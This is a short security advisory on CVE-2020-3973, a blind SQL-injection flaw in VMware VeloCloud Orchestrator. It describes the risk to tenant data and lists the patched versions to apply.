The impact of this issue announcement is high (CVE Score: 8.5). Please act accordingly to rectify the issue, as stated below.
What you need to know:
VMware has released a security update to address CVE-2020-3973, a vulnerability in VeloCloud. A malicious actor with tenant access to Velocloud Orchestrator could enter especially crafted SQL queries and obtain data to which they are not privileged.
An SQL-injection vulnerability in VeloCloud was privately reported to VMware. Patches are available to remediate this vulnerability in affected VMware-hosted VeloCloud Orchestrators.
With CVE-2020-3973, the VeloCloud Orchestrator does not apply correct input validation which allows for blind SQL-injection. VMware has evaluated the severity of this issue to be in the important severity range with a maximum CVSSv3 base score of 8.5.
Actions to be taken:
To remediate CVE-2020-3973 apply the following patches to VeloCloud Orchestrator Version 3.x:
3.3.2 p2, 3.4.1 and above, or apply a patch to 3.2.2, 3.3.1, 3.3.2 or 3.4.0 (Contact VMware Technical Support to obtain the required patch or version).
What is the impact of not doing the actions?
A malicious actor with tenant access to Velocloud Orchestrator could enter specially crafted SQL queries and obtain data to which they are not privileged.